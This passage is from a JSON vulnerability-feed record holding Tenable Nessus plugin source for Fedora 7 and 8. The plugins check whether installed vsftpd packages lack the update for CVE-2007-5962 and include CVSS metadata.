script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:vsftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"vsftpd-2.0.5-20.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vsftpd\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:06:33", "description": " - Wed May 21 2008 Martin Nagy <mnagy at redhat.com> -\n 2.0.5-17\n\n - fix a small memory leak (#397011)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-05-23T00:00:00", "title": "Fedora 7 : vsftpd-2.0.5-17.fc7 (2008-4373)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "modified": "2008-05-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:vsftpd"], "id": "FEDORA_2008-4373.NASL", "href": "https://www.tenable.com/plugins/nessus/32438", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-4373.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(32438);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-5962\");\n script_bugtraq_id(29322);\n script_xref(name:\"FEDORA\", value:\"2008-4373\");\n\n script_name(english:\"Fedora 7 : vsftpd-2.0.5-17.fc7 (2008-4373)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Wed May 21 2008 Martin Nagy <mnagy at redhat.com> -\n 2.0.5-17\n\n - fix a small memory leak (#397011)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=397011\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-May/010351.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?027c8ed1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected vsftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:vsftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"vsftpd-2.0.5-17.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vsftpd\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}]}
